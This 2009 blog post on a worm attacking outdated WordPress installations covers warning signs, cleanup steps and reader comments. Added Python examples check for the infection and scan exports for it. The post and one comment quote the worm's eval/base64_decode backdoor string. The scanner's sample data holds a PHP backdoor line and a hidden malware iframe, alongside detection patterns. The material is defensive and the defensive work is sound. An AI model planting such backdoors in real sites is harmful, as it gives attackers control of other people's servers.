
Old WordPress Versions Under Attack

Otto42 of OttoDestruct, a key WordPress developer and supporter, reports that there is an “attack” on older versions of WordPress right now. The number of sites hit by this is growing every hour. Protect your WordPress blog now: UPDATE NOW!!!

Update your WordPress blog before you continue reading this post. That’s how critical this issue is.

Things You Need to Know Now

Here is what you need to know right now, constantly updated with news as we get it.

  1. UPDATE NOW! Reports are that this attack impacts older versions of WordPress. The most recent release is 2.8.4 and is not affected; see item 3 for the version details.
  2. Report from WordPress on Attack: How to Keep WordPress Secure. Information on the most recent update of WordPress that prevented this attack on updated WordPress sites: WordPress 2.8.4: Security Release.
  3. Which Version of WordPress is Secure? I’ve just talked to Matt Mullenweg and have a better understanding of the version confusion. When this worm first hit the web, WordPress released 2.8.3 to deal with it. WordPress 2.8.4 was released later, for reasons unrelated to the worm. Once the worm has infected your site, surface fixes do not remove the “back door” it injects into your database and system, as happened with Robert Scoble. Upgrading does not clean an already infected site, so those who report being infected after upgrading were infected before they upgraded. Versions after WordPress 2.8.3 are safe, but upgrade to 2.8.4 anyway as it includes other fixes.
  4. What Version Am I Using? If you are using a WordPress version after 2.7, the nag screen on the WordPress Administration Panels will alert you to upgrade. If you are using an older version, upgrade now. Don’t know what version you are using? Without a nag screen to tell you to update, you’re using an old version. Checking the Administration Panels footer will help, but don’t waste time looking. Just update now!
  5. Use a WordPress Plugin for Protection: Do not rely upon a WordPress Plugin to protect you. There are many reports of Plugins that will “help” in the comments. While they might help in other ways, please upgrade now. That is the only solution if your site has not been impacted.
  6. How Does This Worm Work? We’re awaiting details from security experts on how this worm works. Personally, I’m waiting for the name of this thing since that does make searching for details on this worm easier. Anyone got a name for it yet? Since it isn’t exclusive to WordPress, calling it the WordPress Worm would not be appropriate. :D
  7. WordPress is Not Secure: WordPress is incredibly secure and monitored constantly by experts in web security. This attack was well anticipated and so far, WordPress 2.8.4 is holding. If necessary, WordPress will immediately release an update with further security improvements. WordPress is used by governments, huge corporations, and me, around the world. Millions of bloggers are using WordPress.com. Have faith they are working overtime to monitor this situation and protect your blog.
  8. Fear of Upgrading: This attack is serious enough to overcome all your fears of updating. If older WordPress Plugins are holding you back, update them to the latest version or replace them with new. If your Theme might break, contact the Theme author and update or replace it. There are thousands of free Themes to choose from, probably some better than what you are using. If you are using a recent version of WordPress, updating is as easy as clicking a couple buttons. If you are using an older version, download the most recent version and upgrade now.
  9. Other Issues? Whatever your issue is that keeps you from updating WordPress, get over it and update now to protect your site.

When we have updated news, we’ll add them to this post and/or post a new article.

How Do I Know If My Site Has Already Been Attacked?

There are two clues that your WordPress site has been attacked.

The first clue is strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.” URL-decoded, the injected part reads {${eval(base64_decode($_SERVER[HTTP_REFERER]))}}: PHP that base64-decodes whatever arrives in a request’s Referer header and executes it. The attacker’s commands therefore travel in a request header rather than in the URL or the page itself, so the thing to inspect is the permalink structure stored in your settings, not just the links you happen to see. Check Settings > Permalinks for anything beyond the normal %tag% placeholders such as %year% or %postname%.

The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. Because the account can be hidden from the Users screen, also look at the users table in the database directly (through phpMyAdmin or a similar tool) and compare the accounts there against what the Administration Panels show. You will probably be unable to access that account, but Journey Etc. has a possible solution.

WordPress.com blogs are not impacted as they are kept up to date. Only out-of-date self-hosted installations are impacted; see item 3 above for which versions are safe.
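The two clues above can both be checked against the database rather than the admin screens. The following is an added example, not code from the original post or from WordPress: it builds an in-memory SQLite copy of the three tables involved (wp_options, wp_users, wp_usermeta) with constructed rows so it runs offline; against a real site the same two queries run unchanged on MySQL. The table layout and the PHP-serialized form of the capabilities row are WordPress’s own; the sample accounts, the “lorelle” login and the timestamps are made up, and the rogue account’s login and e-mail address are the ones a commenter below reports seeing.

```python
"""Added example (not from the original post or WordPress): check a WordPress
database for the two infection clues, the tampered permalink structure and the
hidden administrator account.  Runs against a constructed in-memory SQLite copy
of wp_options / wp_users / wp_usermeta; the queries are plain SQL that also
works on the real MySQL tables."""
import re
import sqlite3
from urllib.parse import unquote

# Constructed option values.  The first is the URL-encoded string quoted in the
# post, placed where the worm put it: in the permalink_structure option.
INFECTED_PERMALINK = ("/category/%postname%/%&(%7B$%7Beval(base64_decode("
                      "$_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/")
CLEAN_PERMALINK = "/%year%/%monthnum%/%postname%/"

# The placeholders WordPress itself understands in a permalink structure.
LEGIT_TAGS = {"year", "monthnum", "day", "hour", "minute", "second",
              "post_id", "postname", "category", "author"}
# Anything that looks like PHP has no business in a permalink structure.
CODE_LIKE = re.compile(r"eval|base64_decode|\$_SERVER|\$_GET|\$_POST|\$_COOKIE|\$\{", re.I)


def check_permalink(structure: str) -> dict:
    """URL-decode a permalink structure and report anything that is not a %tag%."""
    decoded = unquote(structure)
    tags = set(re.findall(r"%([a-z_]+)%", decoded))
    leftovers = re.sub(r"%[a-z_]+%", "", decoded)   # what remains between the tags
    code_like = CODE_LIKE.search(decoded) is not None
    unknown = sorted(tags - LEGIT_TAGS)
    # A clean structure is tags joined by slashes and plain path characters only.
    clean = (not code_like and not unknown
             and re.fullmatch(r"[/a-z0-9._-]*", leftovers) is not None)
    return {"decoded": decoded, "unknown_tags": unknown,
            "code_like": code_like, "clean": clean}


SCHEMA = """
CREATE TABLE wp_options  (option_name TEXT, option_value TEXT);
CREATE TABLE wp_users    (ID INTEGER, user_login TEXT, user_email TEXT,
                          display_name TEXT, user_registered TEXT);
CREATE TABLE wp_usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT);
"""


def build_sample_db() -> sqlite3.Connection:
    """Constructed sample: the site owner plus a rogue administrator.  How the worm
    hid its account from the Users screen is not established by the post, and the
    queries below do not depend on it: they read the tables, not the screen."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    con.execute("INSERT INTO wp_options VALUES ('permalink_structure', ?)",
                (INFECTED_PERMALINK,))
    con.executemany("INSERT INTO wp_users VALUES (?,?,?,?,?)", [
        (1, "lorelle", "owner@example.com", "Lorelle", "2008-01-01 00:00:00"),
        (2, "WordPress", "www@www.com", "Administrator (2)", "2009-09-04 03:12:00"),
    ])
    # WordPress stores roles as a PHP-serialized array under {prefix}capabilities.
    con.executemany("INSERT INTO wp_usermeta VALUES (?,?,?)", [
        (1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
        (2, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    ])
    return con


def permalink_from_db(con: sqlite3.Connection) -> str:
    row = con.execute("SELECT option_value FROM wp_options "
                      "WHERE option_name = 'permalink_structure'").fetchone()
    return row[0] if row else ""


def list_administrators(con: sqlite3.Connection, prefix: str = "wp_") -> list:
    """Every account holding the administrator role, straight from usermeta.
    `prefix` is the table prefix from wp-config.php; it must come from you, not
    from user input, because table names cannot be bound as parameters."""
    sql = f"""
        SELECT u.ID, u.user_login, u.user_email, u.display_name, u.user_registered
          FROM {prefix}users u
          JOIN {prefix}usermeta m ON m.user_id = u.ID
         WHERE m.meta_key = ? AND m.meta_value LIKE '%"administrator"%'
         ORDER BY u.ID"""
    return con.execute(sql, (prefix + "capabilities",)).fetchall()


def unexpected_administrators(con: sqlite3.Connection, known_logins: set) -> list:
    """Administrators whose login you did not create: the back-door accounts."""
    return [row for row in list_administrators(con) if row[1] not in known_logins]


if __name__ == "__main__":
    db = build_sample_db()
    report = check_permalink(permalink_from_db(db))
    print("permalink clean:", report["clean"], "| decoded:", report["decoded"])
    for row in unexpected_administrators(db, {"lorelle"}):
        print("unexpected administrator:", row)
```

The point of reading wp_usermeta rather than the Users screen is that the screen is rendered by the same installation the worm controls; the database row is harder to hide. Run the queries against the live tables from phpMyAdmin or the mysql client, and treat any administrator you did not create as the back door the post describes.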

To Prevent Your WordPress Blog from Attack

To prevent this form of attack, update your WordPress site IMMEDIATELY to the latest version. Change ALL passwords to a strong password immediately, including WordPress blog access for all users, database, FTP, control panels, everything.

See the articles below for more helpful information on how to harden and protect your WordPress blog.

If Your WordPress Blog Has Been Attacked

If your site has already been attacked, the hack goes deeper than the files on disk: it changes the database, including the permalink setting and the users tables where the hidden Administrator lives. You can find help in the WordPress Codex article on how to deal with a hacked WordPress site.

We’re looking for specific solutions, but the easiest appears to be to export all your content with the built-in XML WordPress export (pre 2.1 versions, try the WordPress-to-WordPress Import WordPress Plugin) and remove your WordPress installation completely, keeping only your images and other files you recognize. Before copying the uploads folder back, check it for PHP files that should not be there; a file you cannot account for may be part of the back door. DO NOT EXPORT YOUR DATABASE! Install the latest version of WordPress, add the “clean” backup of your WordPress Theme (a copy from before the attack or a fresh download, not the files from the hacked site), then import the XML export. The export contains your posts, Pages, and comments, and hopefully no other hacked code, so look it over before importing it.

“How To Completely Clean Your Hacked WordPress Installation” by Smackdown is a good article on how to reinstall WordPress after being hacked, but take care to keep your export limited to the post content, comments and Pages, not the entire database, as the hack goes into the database.
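The export itself deserves a look before it goes into the fresh installation, since anything the worm injected into post bodies or comments comes along with them. The following is an added example, not code from the original post or from WordPress: it scans a WordPress XML export (WXR) for the kinds of injected content the post and its commenters describe, PHP eval/base64_decode payloads, iframes, scripts and invisible links. The WXR snippet is constructed for the example; the element names and namespaces are those of the WXR 1.0 format WordPress produced at the time, and the indicator list is an assumption you should extend with whatever you actually find on your site.

```python
"""Added example (not from the original post or WordPress): scan a WordPress
XML export (WXR) for injected code before importing it into a clean install.
Parses post bodies (content:encoded) and comment bodies (wp:comment_content)
and reports every indicator hit, so nothing the worm planted is re-imported."""
import re
import xml.etree.ElementTree as ET

# Namespaces used by WXR 1.0 exports (assumed format; check the rss tag of yours).
NS = {
    "content": "http://purl.org/rss/1.0/modules/content/",
    "wp": "http://wordpress.org/export/1.0/",
}

# Indicators drawn from what the post and its commenters report seeing: PHP
# eval/base64_decode payloads, injected iframes and invisible spam links.
INDICATORS = {
    "php_eval": re.compile(r"\b(?:eval|base64_decode)\s*\(", re.I),
    "iframe": re.compile(r"<iframe\b", re.I),
    "script": re.compile(r"<script\b", re.I),
    "hidden_link": re.compile(
        r"<a\b[^>]*(?:display\s*:\s*none|visibility\s*:\s*hidden)[^>]*>", re.I),
}

# Constructed sample export: one clean post and one carrying injected content.
SAMPLE_WXR = """<rss version="2.0"
     xmlns:content="http://purl.org/rss/1.0/modules/content/"
     xmlns:wp="http://wordpress.org/export/1.0/">
<channel>
  <title>Constructed export</title>
  <item>
    <title>Clean post</title>
    <content:encoded><![CDATA[<p>Nothing odd here. <a href="http://example.com/">a link</a></p>]]></content:encoded>
    <wp:comment>
      <wp:comment_content><![CDATA[Great article, thank you!]]></wp:comment_content>
    </wp:comment>
  </item>
  <item>
    <title>Injected post</title>
    <content:encoded><![CDATA[<p>Real text.</p>
<iframe src="http://malware.example/x" width="1" height="1"></iframe>
<a href="http://spam.example/" style="display:none">cheap pills</a>]]></content:encoded>
    <wp:comment>
      <wp:comment_content><![CDATA[<?php eval(base64_decode($_POST['c'])); ?>]]></wp:comment_content>
    </wp:comment>
  </item>
</channel>
</rss>
"""


def scan_wxr(xml_text: str) -> list:
    """Return (post title, field, indicator) for every hit in post bodies and comments."""
    root = ET.fromstring(xml_text)
    findings = []
    for item in root.iter("item"):
        title = item.findtext("title", default="(untitled)")
        fields = {"content": item.findtext("content:encoded", default="", namespaces=NS)}
        for n, comment in enumerate(item.findall("wp:comment", NS)):
            fields[f"comment[{n}]"] = comment.findtext(
                "wp:comment_content", default="", namespaces=NS)
        for field, text in fields.items():
            for name, pattern in INDICATORS.items():
                if pattern.search(text):
                    findings.append((title, field, name))
    return findings


def safe_to_import(xml_text: str) -> bool:
    """True only when no indicator fires anywhere in the export."""
    return not scan_wxr(xml_text)


if __name__ == "__main__":
    for title, field, name in scan_wxr(SAMPLE_WXR):
        print(f"{title!r}: {name} in {field}")
    print("safe to import:", safe_to_import(SAMPLE_WXR))
```

Run it over the real export file (`scan_wxr(open("export.xml", encoding="utf-8").read())`) and clean every flagged item in the XML, or delete it, before importing. A hit is not proof of infection, a legitimate post may embed an iframe, but each one should be something you put there yourself.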

How to Respond to a WordPress Attack

WordPress has been requesting that users update as soon as an update is released for several years. They also now have an excellent team to track down this issue and quickly protect WordPress with any necessary updates.

Please blog and tweet about the attacks. It’s important that we spread the information throughout the WordPress Community as fast as possible, encouraging everyone to update WordPress. Take care not to promote rumors, just the facts, until we know more.

If you have pertinent information that will help the WordPress team track down and stop this attack, please report it to security@wordpress.org.

Check the for more information and support. Also check for news and announcements on security issues and updates on the and in your WordPress blog Dashboard Panel.

Please, keep your WordPress site constantly updated. You are now informed of updates directly through the Administration Panels. Act upon it.

Here are some other articles and information that may prove useful.



Copyright Lorelle VanFossen, member of the 9Rules Network, and author of Blogging Tips, What Bloggers Won't Tell You About Blogging.

197 Comments

  1. sillyandrea
    Posted September 4, 2009 at 3:48 pm | Permalink

    And close off user registration.

    • Posted September 4, 2009 at 3:54 pm | Permalink

      Closing off user registration may not help protect your WordPress blog in this case.

    • Bashir Ahmed
      Posted July 4, 2013 at 3:29 pm | Permalink

      I agree with Lorelle, you can disable user registration on your blog but it will not help you to protect your blog. The best thing is always use up to date WP version, plugins and themes.

      Make sure to scan the themes before installing. Use WP security plugins like “Better WP Security”. Don’t use the “admin” username. Change the default wp_ table prefix to something else.

      Use Login Lockdown plugin to protect your blog from un-authorized login attempts. There are many things you can do to protect your blog.

    • Posted July 5, 2013 at 8:57 am | Permalink

      All good advice. Thank you. Isn’t it amazing we have all these tools, many of them free, to help protect our sites from the evil. I love the WordPress Community.

  2. Cathy Tibbles
    Posted September 4, 2009 at 4:16 pm | Permalink

    Great article – thank you!!

  3. Posted September 4, 2009 at 4:33 pm | Permalink

    They should be able to see the user in the admin area if they turn off javascript on their browser before they load the page.

    • Brisbane
      Posted June 6, 2011 at 4:01 am | Permalink

      Hi Ron,
      I have also tried, but I am not able to see the user in the admin area. I have turned off JavaScript on the browser also. Can you please tell me how it works on your side?

    • Posted June 6, 2011 at 2:15 pm | Permalink

      This doesn’t always work with this hack, but to turn off the JavaScript on the browser, either use an extension for your browser or go into the options and disable JavaScript. It might require a restart of your browser to make this work.

  4. Posted September 4, 2009 at 4:36 pm | Permalink

    I left my WordPress installation at version 2.7 until last week when I found that somebody somehow managed to disable and delete the Akismet plugin.

    This let a whole bunch of spam comments onto the site until I upgraded WordPress and reinstalled the plugin.

  5. Posted September 4, 2009 at 4:46 pm | Permalink

    Thank you. My WordPress will update.

  6. Posted September 4, 2009 at 5:14 pm | Permalink

    I really don’t get why people don’t upgrade. It’s easy to do and just plain stupid not to.

  7. Posted September 4, 2009 at 6:15 pm | Permalink

    Hey thanks for the info.. Updating my WordPress blog..

    • Posted September 5, 2009 at 8:43 am | Permalink

      To All: There are a lot of Plugin recommendations here, some old, some new. Please do not rely upon a WordPress Plugin to help you with this issue. Simply upgrade to the latest version of WordPress NOW!

      @Kashif Aziz: If you are using the Ultimate Tag Warrior WordPress Plugin on your WordPress blog, you are at risk of more problems. That Plugin has been discontinued for over two years. Tagging is built into WordPress now, using many of that Plugin’s capabilities. Please update and use the conversion tool that comes with the most recent versions of WordPress and stop using that Plugin – now.

      @DG: The latest version of WordPress is about 2.8.4. WordPress 2.8.1 is not the latest. There are reports of attacks on 2.8.3. Upgrade now.

  8. Posted September 4, 2009 at 8:06 pm | Permalink

    Hi Lorelle, as I posted in a previous comment the attack also includes a new user “WordPress” with access level “Admin” and e-mail address www@www.com. This user must also be deleted manually from the DB since it does not show up in the users panel.

  9. Posted September 4, 2009 at 9:02 pm | Permalink

    Lorelle, another quick way to see if there is a problem is to look at your users and add them up. If the Administrators, Authors, Subscribers, etc. all add up to less than what the “All” number is, then you have hidden users, which means you have indeed been hacked.

  10. Posted September 4, 2009 at 9:58 pm | Permalink

    There are so many things that people can do to protect themselves from a wordpress attack (that most bloggers don’t do), like renaming the database tables from the default wp_, moving the wp-config file out of the public html area, adding in the 4 secret codes from the wordpress.com API tool, backing up a database, using a plugin like Semi-Secure Login Reimagined or Login Lockdown, adding an .htaccess file to wp-content/uploads to restrict to only image uploads, and even adding an .htaccess file to wp-admin restricting by password or only your IP address (or both!).

    Probably the best free plugin to come out this year is WordPress Firewall – which detects these types of attacks and shows redirects to the home page or 404 instead (and it can email you when attacks happen). Of course updating is ALWAYS the best prevention. I have a whole completely free WordPress security guide on my blog, and from that free series I have been getting all kinds of new clients that need to have their hacked blogs fixed and cleaned. Take preventative measures beforehand so you don’t have to do that!

  11. Posted September 4, 2009 at 10:07 pm | Permalink

    Lorelle,

    This is quite helpful– just found a friend’s wp site hacked this morning and didn’t understand why until your explanation.

    Would you know what versions are “safe”? Most of our blogs are on 2.8.2

  12. Posted September 4, 2009 at 10:54 pm | Permalink

    Excellent article Lorelle. The section and resources you gave on ‘what to do after an attack’ is fantastic. It’s sad to think that most webmasters/bloggers never think of that part until after the fact. And you can NEVER find that information when you’re panicking and angry!

  13. Posted September 4, 2009 at 11:25 pm | Permalink

    I agree with Alex, I don’t get why users don’t upgrade ASAP.
    I upgrade about 80 blogs in average when there is a new update. It is easier to update then than when they get hacked.

  14. Posted September 4, 2009 at 11:47 pm | Permalink

    Regrettably, Astroengine.com was hacked this morning. Usually I’m up to date, but as I’ve been out of town, I haven’t been as careful as usual. This time it was to my detriment.

    A friend alerted me to the fact he couldn’t access links to my articles. The URL was totally out of whack (exactly as mentioned in this article). And another user had appeared.

    I’ve now deleted the extra user from the db (plus the last three that looked suspicious), and upgraded. Going to do a complete reinstall tomorrow morning.

    This is most certainly a case of “lesson learned” for me!

    Thanks for the prompt post and solution!

    Cheers, Ian

  15. rasarab
    Posted September 5, 2009 at 3:52 am | Permalink

    thanks for the info

  16. Posted September 5, 2009 at 5:05 am | Permalink

    @Alex and @Miroslav Sometimes you have to wait with upgrading your blog because not all used plugins work properly with the new release.

    And sometimes you will be forced to do it anyway, like now.

  17. Posted September 5, 2009 at 5:48 am | Permalink

    another reason to update my wordpress

    I just found that someone could reset my password just by adding some code to the end of the login URL of my site. I used WordPress 2.8.2.

    After updating to 2.8.4, that trick needs my confirmation before resetting my password.

    just for your info,,,

  18. Posted September 5, 2009 at 6:30 am | Permalink

    WordPress security must be taken seriously… I would recommend:

    -Install a logging plugin to it (to alert on new attacks, and get an audit trail of everything that is going on):

    http://www.ossec.net/wpsyslog2

    -Monitor your site on real time. This free online tool will notify you if your site is ever modified by an attacker or blacklisted:

    http://www.sucuri.net

    -Stay updated. This link can verify the version of your wordpress site and check if you have any vulnerable plugin or incorrect server config:

    http://sucuri.net/index.php?page=scan

    Thanks,

  19. Posted September 5, 2009 at 6:45 am | Permalink

    This case wasn’t new to me. Happened to me before and I’ve learned my lesson. Here’s my post about it if you may allow.

  20. _ck_
    Posted September 5, 2009 at 7:25 am | Permalink

    Install this simple plugin on any WordPress to block bad queries like that:

    http://pastebin.com/f6697b79

    It could easily be expanded to also look at $_POST data which is another form of attack you’ll never see in your logs.

  21. DG
    Posted September 5, 2009 at 7:41 am | Permalink

    Sorry! But it’s not only happening on older WordPress software, but also on the newest WordPress 2.8.1. The spammers are sending tons of RFIs and spam query strings, resulting in tons of 404s – draining bandwidth & resources.

    Wish someone from the WordPress community would come to the rescue with HTACCESS knowledge.

    DG…

  22. Posted September 5, 2009 at 7:43 am | Permalink

    To prevent this from happening, I think it’s good if you install the Login Lockdown plugin. It’s also good to delete immediately the admin account and create a new one (not named admin of course) with all access.

  23. Posted September 5, 2009 at 8:16 am | Permalink

    I had one of my blogs attacked, a plugin and wp-config were changed. I traced the infected files by watching the timestamp and edited them to remove the malicious code. Fine now.

    I have a question about upgrading to new version. On one of my blogs I am using Ultra Tag Warrior to manage tags. While WP has an import feature, I am facing two issues:

    1. There are more than 15,000 tags and the import script times out after a while. I tried extending the PHP script execution time up to 10 minutes but it is not working.

    2. The current tag hierarchy is site.com/content/tag-name while WP offers site.com/tag/tag-name. If I upgrade to the new version, my old structure will be lost.

    Comments?

  24. Posted September 5, 2009 at 8:42 am | Permalink

    This is why I always upgrade to the latest version the soonest possible. I can’t imagine what would happen if my blog is hacked.

  25. Posted September 5, 2009 at 9:26 am | Permalink

    Thanks for the info.. Good thing I just upgraded my wordpress a week ago :P I have a question though… does this incident prove that wordpress is not as secure as joomla or drupal?

  26. Posted September 5, 2009 at 9:57 am | Permalink

    Thanks for info. Have upgraded mine from 2.8.2

  27. s13ky
    Posted September 5, 2009 at 10:41 am | Permalink

    Hi Lorelle,

    How do we know which version of WordPress we’re using? It’s kinda horrible to imagine that the blog is hacked.

    Thanks

  28. Posted September 5, 2009 at 10:43 am | Permalink

    Last month this kind of attack hit my Joomla website... it took hours to clean it as you have to open all the files and clear the script.

  29. Posted September 5, 2009 at 11:23 am | Permalink

    Alex: Beyond plug-ins, sometimes hand-crafted themes require rewriting before an update to WP will work. If they’re not coordinated, the blog crashes at worst; looks ugly at best.

    Is there any information about where these attacks are coming from? RU, UA, CN?

    A future update to WP could usefully include a means of blocking entire country domains! I get nothing but trash from those three, though there are other offenders. If this means that my blog isn’t visible in some countries, I can probably live with it.

  30. Posted September 5, 2009 at 11:41 am | Permalink

    I cleaned up a site that had the described hack (long string:%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/.). Please look to your permalinks configuration first. I removed the string and the hack has not returned in 5 days, which tells me it’s not a database issue otherwise it would return. I may be wrong, but this is my direct experience with this hack thus far.

  31. Posted September 5, 2009 at 11:43 am | Permalink

    The fact that you have to keep patching critical security flaws is not an indication that WordPress is “incredibly secure”. It’s an indication of a serious problem. WordPress is one of the most insecure pieces of software in existence and after years of security issues its developers are still struggling with basic web security vulnerabilities. The vast majority of these problems (such as sql injection, cross site scripting and authentication bypasses) could have been avoided if security played any role in WordPress software architecture and coding standards. Unfortunately, the WordPress team still don’t have a clue how to develop robust and secure software and their users are paying the price for that.

  32. Posted September 5, 2009 at 11:47 am | Permalink

    I stumbled upon this issue by accident, but unfortunately I was one who was compromised. I have no use for my blog any more, so I’ve deleted it and the database. But for everyone else, can we get some confirmation about what this exploit can be used for? Does it install a backdoor console? Can the attacker access files in another directory? Does it just allow an attacker to steal blog passwords / spam? Does it try and exploit vulnerable browsers / browser plugins? Does it act as a downloader for malware? I’m surprised nobody has asked these questions before.

  33. Maniquí
    Posted September 5, 2009 at 12:52 pm | Permalink

    Easy fix: install Textpattern and forget about this upgrade frenzy.

  34. Posted September 5, 2009 at 1:06 pm | Permalink

    Maniquí – a) that’s not helpful, and b) suggesting that switching to a CMS that gets attacked less just because it is much less widely used will make you immune to getting hacked is simply wrong:

    [Textpattern security vulnerability]

    s13ky – the version is listed in your dashboard of your WordPress admin control panel.

  35. Posted September 5, 2009 at 1:32 pm | Permalink

    I have had about 10 spam comments but no (conspicuous) 2nd admin user. Am I affected or not?

  36. Posted September 5, 2009 at 1:41 pm | Permalink

    thanks for the info.. I just upgraded my friend’s blog :)

  37. Posted September 5, 2009 at 2:35 pm | Permalink

    I updated to 2.8.4 when it was released and everything seems kosher on my blog, except that I woke up to 64 spam comments. (Spam is not kosher!) Is this related to the attack? I normally get, on average, one a day.

  38. Posted September 5, 2009 at 3:40 pm | Permalink

    @Lorelle: I really want to upgrade but the issue, as I mentioned earlier, is that I am unable to find a way to migrate my current tag structure (site.com/content/tag-name) to WP tags (which are site.com/tag/tag-name). Any recommendations on this?

  39. Brad Hefta-Gaub
    Posted September 5, 2009 at 4:31 pm | Permalink

    I’m looking for more specific details on the attack. Has someone done the analysis to determine what method was used for the attack? What was the patch that actually fixes the problem? Was this a SQL injection attack? Was this some kind of an attack related to a known application-level entry point?

    Thanks.

  40. Posted September 5, 2009 at 4:36 pm | Permalink

    @Brad Hefta-Gaub

    I have actually done a complete analysis about a month ago when 20+ of my blogs got attacked. The attack is actually a worm, meaning it’s automated and will use the WordPress login page to “brute-attack” passwords on the admin username.

    Either way, if ANY worm gets a hold of your WordPress admin panel, it’s likely that they can do anything they want besides permalink changes. At that time, they were doing iframe injections and also inserting invisible a href tags to malware sites.

    The point is, you need to “disable” the registration page so it stops hackers right now. Unless you have an absolute need for user registrations, I highly suggest to turn them off as you don’t know if there’s more vulnerabilities.

  41. Jamal
    Posted September 5, 2009 at 5:13 pm | Permalink

    Thanks for the info ..

    Updated :)

  42. Posted September 5, 2009 at 7:05 pm | Permalink

    Just fixed my blog at http://www.fncgamesblog.com to rid it of the messed-up link structure of the attack. Upgraded to the latest version also.

  43. J Reed
    Posted September 5, 2009 at 8:26 pm | Permalink

    I use IP security.

    • Posted September 5, 2009 at 9:19 pm | Permalink

      @Brad Hefta-Gaub and @Grayda: Of course the WordPress team and members of the community are tracking this issue and have asked all these questions, more frequently than we do. See WordPress 2.8.4: Security Release.

      @Kashif Aziz: Using the built-in WordPress tags conversion feature, convert tags from UTW. Recent versions of WordPress have canonical link redirects, so you should not have any redirection issues. Then either set the pretty permalinks however you want them, or get rid of the odd ball structure. Either way, that silliness is not worth delaying upgrading your blog. Your blog’s safety is MORE important.

      @ZenMonkey: Just upgrade Akismet and you’ll be fine. Along with all kinds of things, spam is just a way of life and I’m sure that spammers are having a heyday today. There have been no reports of a relationship. Wish we could block spammers by upgrading WordPress. Maybe someday. :D

      @The Kotel Team: See reply to ZenMonkey.

      @Alexander Sotirov: It amazes me that so many people call “wolf” every time there is a security issue without any expertise or fact checking. When WordPress 2.8.4 was released a while ago, it was to patch security issues that had been discovered prior to any issue. As one of the many who have spent time inside the “hallowed halls” of WordPress, they have hired and are working with the world’s top experts in web, browser, and programming security. And let’s see, my computer just updated 12 times in the past seven days for OS and program updates, some for security as well as bugs. I’d say that proprietary software has a LONG way to go in general for security issues.

      @Michael Shearer: Cleaning up permalinks does not remove the “hidden” administrator and the back door this worm created.

      @John Burgess: Blocking whole countries is useless (for so many reasons) as there are many legitimate sites in those countries, too. Remember apartheid and all the attempts to put a wall around countries in the past? Never worked then, and won’t work on the web. People always find a way through.

      @momoc: Sorry your Joomla site was attacked by a similar worm. Luckily, with WordPress it doesn’t take hours to clean this up. And a quick upgrade prevents it. Does Joomla offer an upgrade to fix this for all Joomla users? I sure hope so. I fear this one is going to encourage more – against everything, not just WordPress.

      @s13ky: You got an answer, but I’ll add it here. The WordPress version is listed at the bottom footer of older versions of WordPress and in the WordPress Administration Panel called the “Dashboard” which gives a summary of your blog’s information in current versions.

  44. Jericho
    Posted September 5, 2009 at 9:29 pm | Permalink

    Lorelle: “have hired” and “are working” implies now and moving forward. I can assure you, just about everyone will be happy if that is the case.

    However, that is not how WordPress has operated in the past. It has always been difficult to report security issues, WP has not maintained a standard method for contact for security issues, many developers have ignored e-mails regarding vulnerabilities and there have been a long string of remote exploits that allowed an attacker to completely take over a given WP install, inject spam or worse.

    Further, your computer updating “12 times in the past seven days” makes me wonder what software you are using. Even with Windows running Firefox / Thunderbird / Java / Acrobat, you wouldn’t upgrade near that many times. Even if you magically had, it means the companies are patching the software and it is warning you of security issues. That does not speak to the (in)security of WordPress in any manner.

  45. Posted September 5, 2009 at 9:40 pm | Permalink

    I was able to remove the extra admin user in the wpuser and wpusermeta tables through phpmyadmin and then upgrading. After, I had to reset my permalinks, but everything seems to have come out rosy…

  46. Posted September 5, 2009 at 10:40 pm | Permalink

    This actually happened to me friday at 12:01 am, the minute I started a giveaway on the site. Luckily, after changing themes and realizing it was in the wordpress core, I upgraded wp without even finding this. Great advice, it worked immediately for me.

    Many other wp users will be lucky to have this info. You do great work! Thanks again!

  47. Posted September 5, 2009 at 11:34 pm | Permalink

    Thats true, I myself logged in to my admin dashboard and found a new user registered as administrator, first I thought that I have committed some mistake at wordpress options but found those to be ok. I instantly deleted the new admin user, upgraded the WordPress to the latest version (I was running 2.8.3) and then scanned the posts to see if there are any hidden Viagra links inserted but nothing was compromised.

  48. Brad Hefta-Gaub
    Posted September 6, 2009 at 12:07 am | Permalink

    @Lorelle – thanks for the link to the wordpress.org post. I had already seen that. It’s not exactly what I would describe as very detailed. But if that’s the best the wordpress team has come up with then, I guess that will have to do.

    I’m not a hater, quite the contrary, I’m a big fan. But candidly, this is not exactly the way a sophisticated software team handles security issues. A more standard approach would be to include a more detailed description of the attack and how the code fix actually addresses the attack.

    I realize this is not your responsibility, and you’re a very busy (and very valuable) resource to the WP community in general, so I’m not asking you to defend or react to this feedback. However, if you could please express that at least some of the community would like to see a more thorough (industry standard) handling of these types of events, I think it would go a long way toward addressing some of the concern that is being expressed about WP being insecure.

    Simply saying “stay up to date” is not a sufficient answer. That wouldn’t work for Unix or MySQL or Apache or many other quality server software packages, and it shouldn’t be acceptable to the WP team either. You are better than that!

    • Posted September 6, 2009 at 11:57 am | Permalink

      Actually, the How to Keep WordPress Secure article covers a lot. There are others with articles out there explaining how this worm works, especially as it attacked Joomla and other sites a few months ago, leading WordPress to release a security update to protect WordPress users.

      It is also general policy NOT to explain in graphic detail how an ongoing exploit works. Update is a good answer, since the majority of users do not care nor need to know the reasons; they just want their blogs safe. However, there are many with fewer scruples who are publishing this information.

  49. Brad Hefta-Gaub
    Posted September 6, 2009 at 12:12 pm | Permalink

    @Lorelle – I am sad to hear your reply, because candidly: it’s not at all in sync with industry standard best practices.

    WordPress is open source, so any vague sense of “security through obscurity” that comes from not publishing the details of the exploit is really naive. I can and will go to the source code, look at the diff and get the answer I am looking for. Any hacker could do the same, so by the wordpress team not publishing these details, they haven’t actually made it harder on hackers, they’ve only made it harder on security and IT professionals.

    I understand that the vast majority of wordpress users don’t need or want this info… and for them the “always upgrade” mantra is the best. But that’s not the way that real security professionals that need to operate software in mission critical settings operate.

